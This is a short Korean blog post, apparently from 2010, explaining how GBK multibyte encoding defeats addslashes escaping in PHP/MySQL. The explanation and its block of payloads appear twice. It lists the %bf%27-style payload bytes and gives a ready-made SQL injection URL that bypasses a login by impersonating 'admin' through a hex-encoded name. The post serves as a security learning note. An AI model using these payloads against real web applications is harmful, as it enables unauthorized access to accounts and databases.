이전 글에서 mysql의 함수를 우회 하기 위해 addslashed 함수를 사용한다고 했다
그리고 아래 주소들에서 해당 함수의 우회 법을 찾았다
http://hi.baidu.com/b14ckb0y/blog/item/c0bc0503e5d3a5074bfb51b6.html
http://blog.sina.com.cn/s/blog_4e41d2090100a4bc.html
http://bbs.yxlink.com/archiver/tid-147.html
http://blog.163.com/hack__eye/blog/static/11355884420097280405537/
character set이 'GBK'로 되어 있을때
%bf%27
%c1%27
%cf%27%20
위와 같은 방법으로 싱글 쿼터를 대신할수 있다
위의 방법을 썻을때
addslashed 함수에 의해 쿼터 앞에 \ (hex = 5c)가 붙게 되고
%bf%5c%27 이런식으로 된다
따라서 %bf가 %5c에 영향을 줘서 %5c(\) 는 무효가 되고 그 뒤에 %27(single quote)는 효력을 잃지 않게 된다
addslashed의 기능이 포함된 함수는 mb_convert_encoding등이 있다
사용법 http://주소/?id=guest%bf%27or%20id=0x61646d696e%23&pw=1
그리고 아래 주소들에서 해당 함수의 우회 법을 찾았다
http://hi.baidu.com/b14ckb0y/blog/item/c0bc0503e5d3a5074bfb51b6.html
http://blog.sina.com.cn/s/blog_4e41d2090100a4bc.html
http://bbs.yxlink.com/archiver/tid-147.html
http://blog.163.com/hack__eye/blog/static/11355884420097280405537/
character set이 'GBK'로 되어 있을때
%bf%27
%c1%27
%cf%27%20
위와 같은 방법으로 싱글 쿼터를 대신할수 있다
위의 방법을 썻을때
addslashed 함수에 의해 쿼터 앞에 \ (hex = 5c)가 붙게 되고
%bf%5c%27 이런식으로 된다
따라서 %bf가 %5c에 영향을 줘서 %5c(\) 는 무효가 되고 그 뒤에 %27(single quote)는 효력을 잃지 않게 된다
addslashed의 기능이 포함된 함수는 mb_convert_encoding등이 있다
사용법 http://주소/?id=guest%bf%27or%20id=0x61646d696e%23&pw=1
'컴터 때찌 > Experience' 카테고리의 다른 글
| SQL injection을 방지하는 위해 사용하는 두가지 방법 (2) | 2010.09.17 |
|---|---|
| mysql table 보기 (2) | 2010.09.15 |
| 위키 백과 [ Hotspot ] (0) | 2010.06.22 |
| 무선 (0) | 2010.06.22 |
| exec_shield (0) | 2010.05.25 |